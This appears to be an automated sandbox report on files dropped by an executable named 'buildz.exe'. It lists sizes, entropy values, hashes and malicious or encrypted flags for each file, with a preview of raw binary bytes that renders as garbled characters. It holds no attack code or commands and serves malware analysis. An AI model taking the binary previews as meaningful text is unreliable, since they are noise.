                        Preview:{. ".2 .....-......B.H.v.r.8.UO.....!.Tm(..h..Z:..HjN.8....v.I.t...8.....bn#.?B.7^t\.........h.z7..J......x..>..<=..SrE..=......Fa.o......R"..X...o.3.#....*..Z.xfw.N.Q.....*..0v.m.......h#~s.X...$....H.b..q....L......?.....E...u..;8/.JI..>..w..c...K...jF.....1.KR.......~t>..0..\=..._....V.......fOH2..?p..V..#.os[..U.~.\g.~n@_..R.E[.U.?..7T:....9[g..,.9"..Z..Y.<.7..I.NF........M%uh...0....1*.X.I?.....Mu.g6.n.v.Ns.P..E..S.|....l|..D........3%aeV4.Q.(\(........}!...;h..(#H3....AmG.<^.wB...K.......O...a....(r.No..1d....z...Jf..w..G..5.......$....d.[.. .......L....<..t.....p..s....b.t...-.........R*xH1.*.L}...=.~z...X...[..... .sLL.....[..0o.;."@../......2*u........xY....h.{.O.ZPzu.-...>..NJ.......@....g..8c.t......A}...]E.B.-.W.._.(.g5....Uh....I....0.....G.uA.....)u.-.*..%_.'.+...}..D7O...3.|q......2nm...4.hI_0...An(..?...3.gR.|,.].h.V~L-.....@.[...[.p{.2..{f..,4-./X-d.{..T.v.Z.=.|.}>..&RP3...^....H....$&t....:..p%w..2j..g...n3w.N.!...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14769
                        Entropy (8bit):7.989146281951994
                        Encrypted:false
                        SSDEEP:384:y5kd7GY9xy0H+4C4t2Xg+5ThBxY2oBysFK9+wA:xDfLAXg+xYEGO+wA
                        MD5:4DDC5333BFB9975D0BD9C234515BC224
                        SHA1:40D9FAA66BFB344EAE9B3F685C576EB32A894585
                        SHA-256:063D825BC7C0EE2CCBAB15490DC0712F0A85CF3B0724C442EB8B890440B7CDB8
                        SHA-512:3F6B9FF62D69AC1B355AF1FDBC52988533F7B1D938966D583C7E1153B54802F45BB32F64EE7E38EA468A87B9F5384D0703715BF85D8102F7108B043F91AFC111
                        Malicious:false
                        Preview:{. "....9..U{."........9..8Y..F.W9.q....QBa..&.>..}.zN.`....`...'.......2...........W...j.f..K.y...gXFbj.J..!...%.}A.p..#-.a..c..j...Y&g/.F..-]G........u.!.1...9-....M.....,i....n.U..&./J.t.}..nw..1.2...}.ss(.....Ik.P...!4..b..A...X.<~...Q...n.{.........g..)3./..\Lq...QF...P)~G......S....,H8{wsST.i.#..K&+O.H..=......#"<T.wy...Y..0...,{.WF0e.....C..;...!....^.<..#a)'...YOj2'1....e..b...,]}..n....(....c,...........a.l...}..X../>iWt7..F.......8....h...Y....w. .....1..J.`...~...N.q..sz....'..8.;...}...(*..g.^....iC(.Vd..9L3.....qxV....&.B....v....w_!...0....s.....8,).H5.X.}e....D...7...8... Yk.3%&1..&....9.*....H..O.LW.^AH.}e\.^f.....tM....a./~..^...X..I7....B..h..ge..[./>.u....0.^0ua..(,..Iz^.*...6."..\W..........Ps.'..<....t....D..[...]k?.S..T`,.4.....&...#S`.g._.y.$....Ou........K.a.x$L..a..'2.w..ZA..rzw..1.........'@.92.c..4..B........V%E.;v...^.^.....-6...b$d......g..B..J.r...7.ElD ...^.".Ou...~.....(.rXN..a..U.../1.....@.....#.Q
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14956
                        Entropy (8bit):7.988396984427988
                        Encrypted:false
                        SSDEEP:384:jwiP3HJcfN283OG7kjLtrT/RZ2ot3TTLVx4tYA:jwiP6I0OJVn/DxtjfhA
                        MD5:90310C2591EBE5ECE2474D73371E59BF
                        SHA1:95DEEE2618965EC942B0CA55F4780E96984FAC19
                        SHA-256:9C62AAFF0F5DBFCE15BE8DD25439F1A92790AFB5545EE97A19099D5F4DCC51F1
                        SHA-512:D6562477FBA186BDF98FAC48AB3F51B35A787A878EB853B13A8395E26C33ACCFE69734E9CCD0ABC63DA1FBF994698079D09142E9CE66D72AA598166462114BCF
                        Malicious:false
                        Preview:{. "v..o&......ta...`TL.`+L.8.~.p/y.....Us.p.G.I...d....jo..~. ..eU.........,..jb.b........... Qyg%E*^..l....+$&...1.5.H..+.......l+A..5.nC..}...|.-5..D5.[.F.....|..4..a..@_C..........Y.....Ef...a.H..5Y.Basc'.A...'#z.|..~........1,#..b.g.......\.@I=..8{x.m..._P......@b.{.gC...c)2n()..........W.T.V..&...x.,..m.|^i...\.T...[<..).p..,d1..."./..:.4.=.....a.......f..G ....!.].c.;Z../.O.eg...'5..n.Xp..~._.......h..>(AC...:......W.......>F.Cg.Y.U.G..S.[......M...b...+3M.._.Qk........q(Xf..*......fM...:j..}.+.a.<!....x......4..W6......9\.y].w."..h....Q..S.....h..K..n.f.1iZC..-uM....Q./.W\.*..A...\.p.T.....J../R.. g..c.3"Q..v...:.......6`-.....I..BfO|2...ZR.h..*?.x.U..9l.!.....s....|. 0.g.Oh.,..~...5o.....R..R......449...._<3N.Q.....p:.{.vwo-....>..&N.K..=$.#bl.s.)..s8......=..@..$;G..Q...&G.'M..6..U_...<.T,N.|....F1t.o..p..?......?.0..BZ..{{.=..G.......u.S...g......40.J.....>.....y.KY...'..gI.[.......8.=..f......2[.."h......?..%.y..T]k... I.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20815
                        Entropy (8bit):7.9914652141405025
                        Encrypted:true
                        SSDEEP:384:FPwb8sV6tzDx72Vh8+QQDKMBdL1HHdC+Q4gMhoCb+c37pA7yWqvef80zA:FPU6DV2Vex1mdL5g19a+c3VA7o2zA
                        MD5:FA889286FEE9919684C928E2116D7C30
                        SHA1:3599CE6CA852CA3E9B586F48A8CE2FB03A51049D
                        SHA-256:E64E7CAA2FB5306E4B272BCFC48875019904C7F1F7491FF95D15963846BD14E8
                        SHA-512:57283BEC158478E1AAFE405302C9DF8494787244FA68D7A84F170940A9BED859B7787749A860CF477716482A11F008965C5153A72EDA9C0C063010D660D098ED
                        Malicious:true
                        Preview:{. ")V@.H.a-....D?...C.H;. eooq.Q..\.I...a.b.eo...N~..C4......6r.y.}"7.O`..v=.s.r.hO.,.AqL..j.....2.7....'..Jddh7.Tk.t...q.:...&....-.m:.*zZ.zX{wu%...".DG......iD...GV,......K.4..vS.]! .|J..`.G..l.9...G..5....\...g.d..x..".|)J.....8C.Q..X..?ph..,.m<.....8.........F...D.F..p#...pN>C.~U;XP..,eeBS.3!..>.....n..e.D4G....e..Ew.g`....q).j^.M..Za..y"....jK.~bI..@..._qp..Y5.}..&........fv...A.o/......1FL..a..p..).....Y....D.......d$0*R.1....<..P.s...;1.'\.2....%....P.a.Q.D....;....A.P{>.r...$qq^.I.........)..U.......:....6.A..#..t....\.%.].7e...SV8_.Mk.Kq.'$..q.'.J.....oH:|.e..'..My....x.......O.....~.].N.J<...h..zwL.@...wo*..#....#3.B..$..."..W....7..G.:.[.a...u.oq.i_...<..E....5...y.`.3......z."f.M.........1.Y.i..~..Pu.y...1p.I*.f..K.9E.cY%.A@>.~!4h..ip...p.....m`..P.......;;.=P..c.W.1.UC.P.:\.c..'5g.G.!.u....T....&.zRny...]....{1>mG...y..@..'.9.0....].+B.u...&.._.`...\..y.#Z.a.)s....f..l.s..P.>.....r.-...a#...m.1..>X{;^.B>J[..*^i.,...l.j.._
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14512
                        Entropy (8bit):7.987112069970542
                        Encrypted:false
                        SSDEEP:384:xiAUICQGM2FY0agPxWrtRp39Q/kV1DoxPYZA:pfUdFY0agArtRNQ+oxP2A
                        MD5:9059A977BBB1413C88B3F68E1BBE112B
                        SHA1:739697FEFCE5BF2E4EC786D0C38E51CE9C317D9A
                        SHA-256:B0DD998707123948036CE79B075A049EFF96A0240D219287C38CC936DAB2314A
                        SHA-512:F145DF775C9B2FBE5674A38729A92731DC36942D81D1AEB675906E6AE5F84E752E40D8824DDC4432563A60EB7187FAF0808DE84FD46EBD5B6F67D21A96DA71A6
                        Malicious:false
                        Preview:{. ".N.......{TtJ....jC.n.C{...E9..LXb.....G@c.l...^rF0O....M?KXQ.Am:.5.GKm%..RH$.(..K.L.d..+.r..D..a]..C;0.8T@.7..;.J.o.5..*...u.....F>...G....i.Q.5Q..k..l.uJ.OC..N>.'O.+.y.z.&..V.#5?.a..i_.<....+..~.~...rD.....x...4.R.f.*.*.L.....BZ0.SK.....u...Ab....A.R<..6.~..D(+oaCi.7 . ...]2..n.u..<*.k.........*&.+!.....V...vH........X..-,..d..#_.k.y.7..6w.YJ..[Y.N2....Ns.+O~..!..S%.....!.3)y...}.|.v.{Iw...K..|....Q0.I.l.Q./..Q...7.o...S#.CV.k...c..y.....z..C.5Y$.........b..2.2a.....3.km..f...t....lx5.y...........o.. .^.f."..H...LIE.4d.3........g*..R.eR....8s.].u..S3.T...D...m...:...LB..K..\I6PC.?<g..2B.d..P.......7.....M..h...-.......o 6.-.4q..|..Ew`Y.v..)_..f........z......&.....{...#c.p....!...Wj@..5...8.g.......jF.J..e..:..y).dN.SK>...9.s ..&..-h..Y...e..X.J....\b-...x..0!.....s..h. p..|0.F.b<..T.y..R[...N3.....t...9.|.W..aj.'.w.f.S..O.>.......[p..p*.Fp....[|...t.e4~.a.w...2.9\$.J.... ..nj..8.......c........F.MI..K..w...TY-.QL].^..._a4.V.....!
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13208
                        Entropy (8bit):7.9861560665221765
                        Encrypted:false
                        SSDEEP:384:gEbEyZZNPY8kGYIyxxVqD2mfT9nUB1Pmbcw9BiGFTXL9o477mA:gEbEyZgGCxnqKmfT90ul9TFTXS4CA
                        MD5:F37C77B5589CFCC7689B94666DAE03CF
                        SHA1:32C1E6B832390E7C2926BFB31849994CB0A1FB0D
                        SHA-256:0E12907A66644C3B6E6434983F613BD2CC0EE10659283CD6A206F5EF6865E751
                        SHA-512:E41C683D49F3EDEA7ADE10B01E419382E9C98371C2DA846F4375785F1152CA4429FAA945B67607422BF80788E366E55965A2CF42592181FECBE3D299062C02DA
                        Malicious:false
                        Preview:{. ".m..S..IPC......n......w.....2fQ.s.}..]..!.C{#.*^N....... .y...2l.h.0.PJ..z.P.iz.).^....E.....Cf.5.U.0c.n...h....K....^.....d.....Fc.bN.7xu}..<{.=..+b:;....X.v....N.D..c..%.3.y...8.hi.d.s.Q........R$.....k...]NM.......q..o7A~.N~.E......H..qgK..E.(...AH.|.|..7...N....c..h.G.SWm...>MV"....&.E..X.x.@R.K.G.B.S0..S......c.W..Le.....H%s.9..xN..8.d}..&.....:...O.O./.#.s.....^..[.1....FT/u..&...`..0].I...%.K..o0..'?.hKz...L.~._I...:D..).&(.o..f.'....._.....?Cx_........aH....<}..gP..<..@.._..I-.~..r./!..^;...Q...Q..W.{..r...'.e.r.HE..."}.$B.h...2.]..|...\N...O9.B&4H!.r.A.F......C...d..l......qg.....8.7(..{.............J\.r*.H.s..Fu.............ZO.....W..m[<[U,.7.x.f.2.....P9...M;......Xa.Lr....G..g.>.....b.G5...k.zu..,....s$d.b....o.......0.a.B.-......a..^K!<..W.4]o.d... ......pNo.A...q..J..`hL.*..+.>........"..y..<..$K....0{.r.N.0$E...u.3.n.wd......r^.......tJD.pk]....o`.....).e..a[u.r.....0.".s...yk4......#.?..m.!^.Syo.n..........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13663
                        Entropy (8bit):7.986499003134291
                        Encrypted:false
                        SSDEEP:384:0zpqkdq3Y5uIBYWdTbZIxytlWWpfpAjQPBkA:c8FcLYETbZIiWWpfJ6A
                        MD5:277A89ADE02793EAD0E1EC688C0505BD
                        SHA1:5EB0F258046672D387DF042F902787D37B0AB3B7
                        SHA-256:8B8F1A3DF70F84131E3EE8185D2BA8F839D4F92A524C2CE4427F49C4957FCF68
                        SHA-512:4F68EFFD5F87D495F2B4424E7FF5AEE73C4FCCB34D3EE3A046860EEE759CD2EE7AB4AD51FAF906641D9C4377EFF1A005236CE8413C7EB89F3D087F5EB8741723
                        Malicious:false
                        Preview:{. "F......x..-.s.%.E;Rk.|.......*..-.~.>. N[..d`.b.W..e%......bN.......a.D.......UK..P.c.O...}@..YJ..0..c..|....!.T.|.3.Z.E].8Q.0E5.`eu.D.-.....c.G...1 Ua....>..b..D...+6_..~PM....,..H.......t..W..47NG.Y).@...>...$..h.^A.y..;.n.B..5%Y......mc.[.wt.....=...%..W...Z...B..].m..R.Vw..3N.!f...v..v..K ....D....o.q...%+........U.j.`...Ex.njY..q..o;.........2..AF..,..d.X.Mse....f...%.;V.YyO.!...F..I.M}..X.....W.......zk..:..G^@..@.j..2....>.4B.H..GN..tf.XX....C..x.c.W.6.O..Y...m./Vc.&.^..D..x.n..Dh....H..@q.jl&.)%..O..}...kM^..R.-2.,.`....y0.>.....$.|..vL.....Vo.#n..T..!....SU...(.[P...? #...f.-..y.a...<#. r...R..`'..u.lv..7..*.8.e}*..e.A.~.A.(.a..I...7.1C..._....$Tz..=..y[....iXW.1....9....B.bK....j.......0...{...v...v6).t....U.T..d..sh..k?..4.....C..+H.!.....tv<..X..RC....Q..v...{.d.i..P'.....C<.d....<S..=m..H0..G+h......'|...H......D|C.).o,&.....c..cC.....c,Uc...q.7M.s...}....=..q.v$.z..y.M.PVyH^...%f.......x...UH.....8..r....e
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):73624
                        Entropy (8bit):7.997657553432749
                        Encrypted:true
                        SSDEEP:1536:1EsSPe5WBxwNAKYN6IFcfc4sO83kKlr2LLvkbDxKH+hSutA:asWe5wwYNUfVkzSvkbDMfcA
                        MD5:311C1628EC223F1EA1612542E77F505F
                        SHA1:B99F87783F6C0E5ED9956CC9777A135E148CBCAB
                        SHA-256:7C15084BD18E27BCDAA9B8E5FBD9A9B13A803AAEEBCD64AAEF15E048557F0072
                        SHA-512:BE67E1DEA61319E266BECA518C8902044B7D4C06E6B873611C742D4ABF0ED044282372EDD0CBCC2F78ADAF8FB66FA984F37C67DA68DF8F24362A320787A593CA
                        Malicious:true
                        Preview:{. "..cKO.[...!F..@4.F.......9v.....@..w..)...&.....0.U...#9..,..F."K...5....s....d$..z....m.....F.............}.r....&.c..p.......]........e....yT.|.n..W*.E.B.......5[o...q..@......s.x...nJ...[.......xu.w......8..y..#"y..c..../F.'.~82......(../...e.=..Gd..d.F....b.kU....?.........:.....6ANm.B.}s@.5d$......i~....}..2.#.^......(...`_'9.,..\.....X.1..../...r@<U.....M...`.w.:..]WBR..%.. 4...-S..,Q...0...r...W.\c.y.7...E....?...J>s?...&O.5.........e..J^...%j..2).0sn.D8d..g...g.%......H......A.._.*-u.u.wU..y/...$QG..{.Bp.5,.....M.M928y.~.pB6.m. ..yv.\.?.d...D41..d ....\,..@..g-.<..S{(!..b.....1ax...}Ak...C...Ts...?.Sc.A..4....AL..6$...'7.m.r..mK..Fg[..2V..w=...*....K.>...Q...J3+....m......a..;.......U......e.?.!3...z..<.z.@..Z.K.v..IQ......`.~a0RJY.....#....Z..jf.d.y.#/.....X.b4...k.....,...;%.W.?-....-.K..%...G...h..2.o.f1..(......K.Y..R..@...Q....S.....b.i.{.|........a...p{.P>.X.L.U..... .!.......A."?vc/.\'Rl..j.U..E0..8.h
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):63689
                        Entropy (8bit):7.997155297228025
                        Encrypted:true
                        SSDEEP:1536:XEKzdlik7peXGtOM5/bwFDfqIDwU0yNcPeJRJkTsZLbjs/bQjHwKuArY46A:3znik7pnVsDDwjScPen6TILbw/aHwKrd
                        MD5:597A08663299CD96A63DCA74C0DD65A2
                        SHA1:3333305E047BB42EA440032551942293B708F204
                        SHA-256:C6F6DBADF9A85C171E7B15E1C2F60CB51677C31E47F627A89C14B62696EA65C6
                        SHA-512:799DA9978C48A9F35C9E07382AE3726EA5CD160E0E28640FD0EDC4821679B5B88133306A2136439F0DB7C0F36B286BA2671FE436E3FE0B233A30898A4C421678
                        Malicious:true
                        Preview:{. "4.[<_.4....,...s.|..T^.w.ub..}..'.O.~.....b......Q.=..o...N.:..~a.l.......N.A.?...-....d,...]]...........?@..f..kd......S...*N..*...y(...m.`.e...,......ZO..3N..V....q..1F8..[..,.\..dsG......$lY.].`.i4......|.5....c..~...g8yTd..l...[@|2\.}...9.TV.L./.G..w...........j.8.....~^.4......V..9..H.....@.....a..7.`-.x..\39..x..>.....jpw!..5.e...U.^1k.x{...9..-.E..c"...F0^....o....:..(.;.s2..\-.?..`.{............:S...._+Y/E.T4T2y.........!... .....l.X5.W..x......:..'...[(...a..?.JG.g.F.....6....0.W..$.~.)....-....d...zR.DR\...M........u..}..a6..l..'....'..{.eS.1.t.J.X....0Ps.Lgj...`.w........a.MiV.xn.B^...V..0.Z'.].*.{.Ah..'/!.|.....<.......^vf..'...o_..-...."\....O]l5.F.D..NO..Q....Q?.u...#...WO..E...#..q .J.<!==.F...m\;q..Ya.p.i>{...AC.6.."4..|...Y.....`].`....(.A...G|1H........*.Fe/.e......|..A.v...S....z...s.v....1..L.[.wN...,....._<..it...H)=.\.a^.d.(u.$..V.|./g...e.(.eWj..L.i....U........V.........AC.Q.~..K...H....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):54912
                        Entropy (8bit):7.996809968520079
                        Encrypted:true
                        SSDEEP:1536:lPPGNnYnnx5QiaEamlvzpYp2eLq51ZtZ1TwA:lPPGNnQnLQinamlGsBEA
                        MD5:365DFC7A43AEAF0536D8EAB49A90DF84
                        SHA1:F6C48F9C22A1D699DE310BBD017E495015AB9E12
                        SHA-256:336DB08C6884E8949D1C9D531CD279060480B4C6D73F1DC7412E1EA6F1371C92
                        SHA-512:35C2CCD0C52EF948872201CC92AE7251960B776FD826D3C21A1D61BE54A9AA0AF67C693C47F62EA64D2594B3FFBC3020E99D1DE638AAEF8569B2121FC19A8D27
                        Malicious:true
                        Preview:{. "7$0j[. r,..G......w..Q.V'._cn.....8...S~.h@......h.g..F........Z...3...'l..2P.#.a}..........,.fw..`...Q-..s..p..R...nR_...[..@J.6p./....o.ft.,q1.8\../^?..7.}.Y.5V.<.|.,..G.8.(UW.w..\).x....~....w.;8x...#..O.!....R.P....EF..<...Q-5.....K@U..JB......_.;..K.R>.-..kt. 4..,..^~.N.S9J^.7...$..8...$7NvIx.."P....J~..9...E.......H~..8$.e..fK}h.....`..C...........S.A.]E99)1.E...rn......l.j.-..1)...t.....s...$.....vt.p.......Jx..!...{x./....Cg...6..4.R..\.....#...+.#.@..5.2.iT8...c&..*.^....7.[..u.-He{.^......Cm.+.|So..E#Cg.))(._.un..5t..;J..}p.MT.n<.T3 s....;5.'.../.s..6......N.V..M.i`..tq*.>=u.<+=.76..X.K..l..&......Z.b{..g..*x{....P{..0.H$....&..U..X.Y.>,.loo.GW.rV.6.wej.......~.&...4d.L..:Y4.,......dg.P>....[..{K..V:\.h.d........1.I....E0......<.i...m.[........q:..'_.4...Y.J.. ..pu."+IOY...h...n?(.2b.p.R&.. .}%?N..Yq....!.,...W.|=......#a.)fSs..U..J.|$_'...:q...6?... t..n..HS...]..7.J%.P.........r.[.V...B...g"O.o."C..?PJ.k....o..;.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):61278
                        Entropy (8bit):7.996540802195676
                        Encrypted:true
                        SSDEEP:768:9dcsDTiyKUtzzXO22bXPik9giKOPFq1ni6YV473MqkzY/DsCPb4G0d64ruy43Ioe:zc2TgCHj8XPikyijNq1FYY1p4NC5AUA
                        MD5:CCB7F4D66F7B1BD9EF02E49B1B010941
                        SHA1:F4CD47AFBA25253AB44F119857454C88A49E1A57
                        SHA-256:79A4C7E1CD21B1495183AE184C40F61766D350606C870F2CD47D544FF5304478
                        SHA-512:C0A1D0E799078FA2EDF42A28A1EFD741AFD1095B408184EE12EE04E77ADCFF868009F29A8972328182E1A7CA3CBF0BEB709057E2672ACFB4449A10908908043A
                        Malicious:true
                        Preview:{. "|..Pc.o.Xt(}......{..*.qI...........v...V.......mu.~=....W.....e.<..M.L.....|...Q..*J...~Nrm..(.../!..o.....d^U.5.R#.....j....=...`.\$..i.. df...e......qE....g.0m'1.#...0X.|....}{..zT..r..7V.{.Qt....B..Pi.....~u..Q.cy..Xd.+.K.y.z.>...... .7.l....SI........"...%]......ME.=p.....ZU<c.2yi.D...X.M..%Y..l.EFSA)O..~.P.&.yXP.....Q...U.|..2..@tMq...a..#'_..6.e...^.569....Q.C.-..Y..+....<.4.h.Y..D..A.L.`....Q...&..r.=....$./...Mk...F.......x.u...]...X,E...D$F%..x.lm...%"OW#.^yL....;..@h....x.l.T..u..0...4.*...T..z..oK&..........].<.oU.....|.#h.......@P.../4l7.T.N#..Df|~4r.|._......OE.f..^m%.....5.E.}.Z.P-8.R..\tB.....~W.$..|..W....`.B..(uU^...4...#.;.RQu.....j>.k/X@...w.Ld-....F..n.b..Z.x.~.......a.-.,!...I.....M...L.6.C.p..j{E...."..F(k.5@#...|. ....3k...(..{u...H......W.\...A..Z..E.pD../..tx$.....H..45l.....P..>z.=;1..g.9..U....?.4\..#...F.....d..3I........i.......d.....9...{..BL!.3.7.7....Y......xc8.0?6.M.o~.....]."..2u..cd_O..4....f..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64991
                        Entropy (8bit):7.996612533414951
                        Encrypted:true
                        SSDEEP:1536:rReRy+FsEnpdPnqewRkx3X9cyZDuQf4pr61c7HcB5GeA:WyEzcapIQAhGS82eA
                        MD5:F93813AEE82B55C25F7500B99304BAB1
                        SHA1:43F467A8C88BA048BA7A3C22943939332AA4EFF1
                        SHA-256:DA187A5F59EB7C387CBB66E4930938A9784208530B620B53DB20D8CB1A8E24F5
                        SHA-512:422D1DA49EC8C4CFC65D6093F73EB6918FD02646F30377DDCFF26B6D0D1E6C2685579B014FBE99F3D0CC3E2F37ABC213E10BB0C9ACDE5BAEC66CADB3A45582FA
                        Malicious:true
                        Preview:{. ".s.M..../...h.m...X"...W...0...;.j.`...Z...4dield.....8..P.2.Z.)3..w....yS.........?)..$gX....x.?.+[./+.......9e..3`..]<..!.E.5./H........<$...d...A<.T...%.8.....HP...]k....S.....v.%.: ...#M.....O..>..M.:s..`.....R4.*.:.....@..C..."..TaB.c.....o..J.....D.kx....(.#]`t6.k3./.dA.K....TL@.[.%..8...u.~.....nK6......|/.7U_..p..M+~..>.6.Bf/Ff....\.M_..X-9.....r..>z|R.......O...ja.U....l.0=..O......Y7..d.........|BC...-.A.K...g0.Z.(ee......[b.i..../o=...~...w|.w..$........}D`....e.K^..(...'\e4<..<X.hv>2E.......V........JeS..he=.U....n.O....6.F.. .:6........y......W.>.p..o.UeP.U..../....h..V..F9..P.Y...(&.v_&.NZ....T.%|.[F%.+.....W....L3]hMk..9Q/!.o.h....+t..j..LKbh.sq...`d.J~wk...#D.....8.7.l{.C..d....U...U....tX.lzRL.l..8...6..4.......=.EXq'..=d.:.t...K.lS.H.....0Wj..C>MQ.....R.ig..e.....L.d-...#..nC&(<*..Tw.c..CM..$.Xk.>9E.k... .w.F......^..e.j...wX.2..M).t.B6;vB.Q..C.qC....R..k....Q.,.qR..N.Lua.#..cc.k....K#l}"O..w..%..8..#..:..i..<....sR....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64983
                        Entropy (8bit):7.997336810847668
                        Encrypted:true
                        SSDEEP:1536:Kmic7/QopASSiqv/2D+XgtG95OlRbkkdtF1Qws/jHZLMbQK4A:KJcLASS1v+0gtGPeAkXF1QwsF4MhA
                        MD5:D5C65D06438B68E246FEBFD8507550EA
                        SHA1:F198F37E39A3D3019FE4B3A621FF7696A527BFCF
                        SHA-256:4B632219C860C1C843A2B052FD535A2F71C774C1C06A26E12259558BDC3AB625
                        SHA-512:C943105A6F1ADBF55C144E68837901721A44123F6D8EA7BF3DAED54F7961C6BA6CA777195337F9083D08116CAABA3EA1DEA847CACD7A8C3959A710F902AE0598
                        Malicious:true
                        Preview:{. ".=.]W...Q....b.n..u..=...z.nE.......V.....1.G..I........E..@.....w..z...up........}%_........J.Ikr..*.....(W'.v,..o..tF....P..d....82......L..q.;....kx+.v..1........Z.."...V(.#f@...uY.u%.D..f........../....>;....../..c....t.=K.ya2beWB..J..eL|t....b.=Z......P....A..B...m.o...w..)._.6\<.E..I..`...SMAU..-...&|. .h.!.d'..C...j..OX.!.......P$^s-.aJ.....g1......L.....;....x.!.3+...r.a.M.U1...Y...G.3.:.S.]z.v..B..DIW...N..BL..E.p8.T..W.=8.."bO/F..|P...._..9m.FC...(.|5.:../....V...Vr@o.)...U..lE...xtt..._G...7..v./=....5Ba....f....R<SE|.$..........6.e.A...@.....Ow....2z......p....g....&.[... .a=.....g.a.aj.`..D.P.....lR.>.s.....8..#....K*.krVS._...L.c.#.*+..k."......o...SC.]9.O....n.5J2N.u.f.j......*.M..=..r;,B|...o....%Z...)I.p"....e}.} ..q.q)......"...\*Bu.ce%..9..)5.\......z$.va.k..|....b.......S.r...........^...6.B...&.?.T).m...6....D".j........>.%.c7.._...7=.h...mcH....b.....i..Ys..K......f..=ap....E}.........+......3;....*.P.@.,n{.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):58407
                        Entropy (8bit):7.997080357651933
                        Encrypted:true
                        SSDEEP:1536:ro/1lN1Mb0n7phrDIyEnbPP1XM9xHzVXnJA:rINybelJKbPPyxHNJA
                        MD5:57D17B81AC2A05FB6B0D82A0EBF5AD5D
                        SHA1:7A0E0647B484C8594560C818AFEDDC39BE17746B
                        SHA-256:51DBC4BA52B0C387128C4C47A06A00C5BCED7151E264E53289C7FB8C6F2A1B93
                        SHA-512:DDAAEA0BD8CBEEF376633D8B2C5913E1250FB278162D54A0C4FE7405C664A869797226437270765A45BF5D2C93AF64123976D85491C095C0DA870942011D843C
                        Malicious:true
                        Preview:{. ".P..t..IHy.(<.3...~.!..4zL..W...........n..C5.R.q;D....}*M..zN..J.z!`a..D...._{.'ZA....K.m2.I.9u..4..-.}.......QV...........J.p...0....U.....c5K.i.g.eh.(%.N.kk.h./.r...-E.?.;...<.....g..?.z..Gj&F..2..w~.oN....X.<.......D..c...*.2F.%....RT.....:..jg`...#....qFe.r.[c.0?....A..........)7Y..g....9.?..4w.S..#TRi._...x......#.4.......c.J.&z...m.........6..5.X...i.u.E...dI.2&y.).D.~......p...=(R..pK..Ss...K..8...\2....../..za.!....&.d.d~.!C*....et7v...L{..<S.@..).Z...K.@...I..y.....0.v~~.B..M....}\.!....}2.......6y.x..v.w..~/..K.(.i(4.io.........y*b{....&.......\}...Dc....[.ZBD.Cw.s...b.\.E....x.#.pz3;&..hy..#1b3.w..n?...X..Gm.>:@8..eh_.o.!..M2.Kz..Fc....lX.bd...n|u..v[..o.......}.....eY.3.....~..U}..4*H...pJ 1h.[.}Z[..." ./.v.#...;E....Y.*...K.Ss."....VK.../.c|.mR....h.p..,...O.4..d.}r.]....X....UH.......g.....w:~.A.}..F.. ..=.GB.1u.....O..O`.c.H..OM........y..T....Eh.u. './........"..cR.....#.tP.Q.G.[i^<..[{..$.......V........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):60955
                        Entropy (8bit):7.99672481802403
                        Encrypted:true
                        SSDEEP:1536:KX0xXyEmD/AIRuxRmMjXpnkM4fiNWpcYYA:KkxXyJrA3xRmykMGaA5YA
                        MD5:A47B5DC8A43B72924362349A6E7BFE45
                        SHA1:8D1F978559FE5CB79C06572D18BCA2E8DAEF923B
                        SHA-256:101A85FE6281F220DDA741F4895771BC46705759D69A569517DBDAD1EA12BE92
                        SHA-512:CD778801D968EFBC061BCAD923840F3D57BCB485AC1DAB76675E33012695CEB65C523FDE33668BE753F061A9EF9E91FBF7BF50A92FE2C3D642A6F2ECC67BFA2C
                        Malicious:true
                        Preview:{. "<y..eP.x.......G.a....3yv$..1....g_..I...=.Eg...k./_.....Y.6.....2}.um.r...wiGg.....m...nV...b...}..x.....|KB.s8.D..B<...#.{...s....VY...k...Nqw.tE..k}F...7...Lc..(...o.n.......Z..C.z..o...!y`..r.......$...Y.V.W.o.p7...U>..8.J...?...a.M.Q.....V`...Bh!.....#D..6.|...RL......7....!..|..u.tO.....P.Lz.v..y.;.....'.'k....]..flZ......\...".t.....`...[..p).A.......I...aw.G..g.mo!..W.t..&r..f.+<.y6...u...g.....c.........4S..x.F?.{...rW.0/.v.$F.1..F..7.l..7x.x.U..R.jo....{.wV.a.[..S....n ....B..s..cG..v...~.D2C|..$..../.{.6R...v....mE.Z..h...)-9.6.....%..../...e.D.1..."4...gGr..M.Q.._e2.MO/...'%-...=f"M..%..L .........QZj\>:....Z.Z.c..B..f4.....y..M....<..>.r>..";".TeJ.`.4...f.(...z....XC..v.*.a.RO..N8.{.*.....7~....I...A.W.EN.l...ct...<M/wv....<a9If.D=.Z..Z}..r.`F^h|a(. ....;kZ.x.k5&..1.|.6.K.)x.G..D*D..z@.mo..Fdc......i..T<|..fI^t#.[u.2..;?....px6r.......h.O..o.....A.9..b..].<T|.?.4.W%...h.Ie.n.-.V.(..E@...r."u.$.......-W.e..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):69778
                        Entropy (8bit):7.997414300517392
                        Encrypted:true
                        SSDEEP:1536:o8dRhCbWd2Bd8rYSRuoe60VpNzg6X435s+OxqSX29yd1bCin2CQZpOA:o8dld2B1Sq60Vnz035spxqo2+BJ1QKA
